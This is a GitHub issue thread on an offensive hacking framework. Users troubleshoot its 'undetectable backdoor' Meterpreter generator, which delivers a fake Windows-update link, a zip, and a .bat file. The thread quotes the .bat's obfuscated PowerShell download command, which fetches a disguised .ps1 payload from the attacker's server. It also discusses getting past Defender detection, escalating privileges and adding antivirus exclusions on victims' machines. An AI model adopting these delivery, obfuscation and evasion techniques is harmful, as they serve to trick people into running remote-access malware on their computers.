search

r0jahsm0ntar1 / africana-framework

The africana-framework is a software designed for network & web hacking by automating as much stuff as possible to detect vulnerabilities on most common services and web technologies. It also has some wide range of penetration testing from internal network, Wi-Fi, system anonymity to web bug hunting. It's purely written for Good and not Evil.
17 stars 7 forks source link

Wrong IP in .bat file when creating a Meterpreter #5

Open TNT5788 opened 2 months ago

TNT5788 commented 2 months ago

When generating a undetectable backdoor and then a meterpreter (you wrote meterpeter in your menu and should be meterpreter) we are getting a link that can be sent to a client with our local IP looking like this : http://192.168.5.29/Update-KB5005101.html. When the client click on that link it will download a .zip file containing a .bat file. When the client execute the .bat file it should download a .ps1 file located in our local Apache server with the IP we entered when creating the meterpreter 192.168.5.29 but the .bat file as the following IP: iwr -Uri "ht%i0%tp://127.0.0.1/Update-KB50%i0_%05101.ps1".

The link in the .bat file should be iwr -Uri "ht%i0%tp://192.168.5.29/Update-KB50%i0_%05101.ps1" it should be our local ip not 127.0.0.1. If you manually replace the 127.0.0.1 with your local ip everything is working fine. Probably something in your meterpeter.ps1 file that needs to be changed. Please fix Thank you.

r0jahsm0ntar1 commented 1 month ago

Fixed

TNT5788 commented 1 month ago

Thank you very much it's now working and don't forget to correct your wording from Meterpeter to Meterpreter.

r0jahsm0ntar1 commented 1 month ago

You welcomed

TNT5788 commented 3 weeks ago

@r0jahsm0ntar1 your framework is now in GO language and the same issue is present when trying to establish a session with meterpreter. the .bat file as the following IP: iwr -Uri "ht%i0%tp://127.0.0.1/Update-KB50%i0%05101.ps1" and the link in the .bat file should be with our local or public IP, something like this : iwr -Uri "ht%i0%tp://192.168.5.29/Update-KB50%i0%05101.ps1". Please fix. Thank you

r0jahsm0ntar1 commented 3 weeks ago

Have you tried now with the new updates?

TNT5788 commented 3 weeks ago

@r0jahsm0ntar1 just updated and it still the 127.0.0.1 IP in the .bat file. Thanks

TNT5788 commented 1 week ago

@r0jahsm0ntar1 updated to your latest revision and it still the same, 127.0.0.1 in the .bat file.

Also, when creating a meterpreter session it's not possible to elevate the privileges anymore with getadmin. Defender is flagging it as a virus and the file is not running. no admin means you cannot create exclusions anymore.